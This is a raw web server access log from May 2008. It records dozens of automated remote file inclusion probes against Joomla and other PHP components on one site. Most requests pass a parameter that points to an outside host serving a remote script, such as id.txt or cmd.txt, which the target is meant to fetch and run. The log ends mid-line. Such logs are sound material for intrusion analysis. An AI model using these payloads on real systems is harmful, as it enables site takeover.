64.180.134.223 - - [28/May/2008:12:04:11 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:12:04:12 -0700] "GET /logs/access_080218.log//gallery//update/update5.php?lang=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:12:04:16 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:12:04:17 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:12:04:18 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:04:19 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.184.18 - - [28/May/2008:12:04:20 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:12:04:22 -0700] "GET /logs/access_080219.log//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:12:04:23 -0700] "GET //main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:12:04:23 -0700] "GET /logs//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:04:29 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:04:29 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.163.169.99 - - [28/May/2008:12:04:47 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [28/May/2008:12:04:47 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:04:50 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:04:50 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.59.130 - - [28/May/2008:12:04:50 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:04:50 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:12:04:53 -0700] "GET /logs/access_080225.log//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:12:05:06 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:12:05:06 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.6.155.217 - - [28/May/2008:12:05:50 -0700] "GET /logs/access.log//////?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [28/May/2008:12:05:54 -0700] "GET //////?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.217 - - [28/May/2008:12:05:55 -0700] "GET /logs//////?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 200 49424 "-" "libwww-perl/5.810" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:06:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:06:12 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:12:06:41 -0700] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://learn.nazdeb.com/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.95.198.223 - - [28/May/2008:12:06:54 -0700] "GET /logs/access_080201.log//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.95.198.223 - - [28/May/2008:12:06:54 -0700] "GET //gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.95.198.223 - - [28/May/2008:12:06:55 -0700] "GET /logs//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.95.198.223 - - [28/May/2008:12:07:02 -0700] "GET /logs/access_080215.log/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.95.198.223 - - [28/May/2008:12:07:02 -0700] "GET /plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.95.198.223 - - [28/May/2008:12:07:03 -0700] "GET /logs/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:07:45 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:12:07:54 -0700] "GET /logs//performs.php/components/com_artlinks/artlinks.dispnew.php=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:12:07:54 -0700] "GET //performs.php/components/com_artlinks/artlinks.dispnew.php=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.210 - - [28/May/2008:12:07:54 -0700] "GET /logs/index.php?body=http://www.jjran.com/board/include/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.210 - - [28/May/2008:12:07:57 -0700] "GET /index.php?body=http://www.jjran.com/board/include/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
61.218.51.165 - - [28/May/2008:12:07:58 -0700] "GET /logs/access_080308.log//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.218.51.165 - - [28/May/2008:12:08:01 -0700] "GET //gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:08:02 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:08:02 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.218.51.165 - - [28/May/2008:12:08:04 -0700] "GET /logs//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:08:05 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [28/May/2008:12:08:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [28/May/2008:12:08:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://municoinco.cl/weba/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:08:47 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:08:52 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:12:09:06 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:12:09:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:12:09:09 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:12:09:24 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:09:42 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.46.131.186 - - [28/May/2008:12:09:47 -0700] "GET /logs/access.log////index.php?seccion=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [28/May/2008:12:09:47 -0700] "GET /logs/access.log////index.php?seccion=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [28/May/2008:12:09:51 -0700] "GET ////index.php?seccion=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [28/May/2008:12:09:51 -0700] "GET ////index.php?seccion=http://xredrum.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [28/May/2008:12:09:51 -0700] "GET /logs////index.php?seccion=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [28/May/2008:12:09:51 -0700] "GET /logs////index.php?seccion=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.147.239.5 - - [28/May/2008:12:09:58 -0700] "GET /logs/access_080308.log//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [28/May/2008:12:10:04 -0700] "GET //gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.74.190 - - [28/May/2008:12:10:04 -0700] "GET /logs/access_080327.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [28/May/2008:12:10:04 -0700] "GET /logs/access_080327.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.239.5 - - [28/May/2008:12:10:09 -0700] "GET /logs//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:12:10:24 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
210.233.25.202 - - [28/May/2008:12:10:27 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
202.190.197.169 - - [28/May/2008:12:10:44 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.6.163.20 - - [28/May/2008:12:10:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:12:10:57 -0700] "GET /logs//gallery//update/update5.php?lang=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:12:10:57 -0700] "GET //gallery//update/update5.php?lang=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.131.186 - - [28/May/2008:12:11:01 -0700] "GET /logs/access_080108.log////index.php?seccion=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [28/May/2008:12:11:06 -0700] "GET /logs/access_080108.log////index.php?seccion=http://www.phanom.ac.th/friendlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.6.163.20 - - [28/May/2008:12:11:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:11:23 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:12:11:28 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:12:02 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:12:03 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:12:12:10 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.239.5 - - [28/May/2008:12:12:15 -0700] "GET /logs/access_080215.log/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.218.51.165 - - [28/May/2008:12:12:22 -0700] "GET /logs/access_080218.log//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.147.239.5 - - [28/May/2008:12:12:23 -0700] "GET /plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [28/May/2008:12:12:29 -0700] "GET /logs/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.18.229 - - [28/May/2008:12:12:41 -0700] "GET /retreat1/?S=D HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:12:46 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:12:12:50 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.95.198.223 - - [28/May/2008:12:12:52 -0700] "GET /logs/access_080302.log//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.218.51.165 - - [28/May/2008:12:13:03 -0700] "GET /logs/access_080215.log/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.74.190 - - [28/May/2008:12:13:03 -0700] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:12:13:08 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.218.51.165 - - [28/May/2008:12:13:11 -0700] "GET /plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.147.239.5 - - [28/May/2008:12:13:13 -0700] "GET /logs/access_080218.log//gallery//update/update5.php?lang=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.218.51.165 - - [28/May/2008:12:13:17 -0700] "GET /logs/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.50.15.70 - - [28/May/2008:12:13:22 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.50.15.70 - - [28/May/2008:12:13:22 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:12:13:26 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:12:13:37 -0700] "GET /logs//performs.php/components/com_artlinks/artlinks.dispnew.php=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:12:13:37 -0700] "GET //performs.php/components/com_artlinks/artlinks.dispnew.php=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:12:14:48 -0700] "GET /logs/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:12:14:48 -0700] "GET /mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:12:14:53 -0700] "GET /logs/access_080220.log/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:12:14:53 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:12:15:20 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.82.245.21 - - [28/May/2008:12:15:28 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [28/May/2008:12:15:28 -0700] "GET /logs/access_080118.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:16:07 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:12:16:07 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.64.180 - - [28/May/2008:12:16:11 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
202.60.64.180 - - [28/May/2008:12:16:11 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hk-jeonjihyun.com/hk/egg/style.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:12:16:45 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:12:16:50 -0700] "GET /index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:12:16:51 -0700] "GET /logs/index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:12:17:06 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:17:30 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:12:17:37 -0700] "GET //index.php?option=com_customp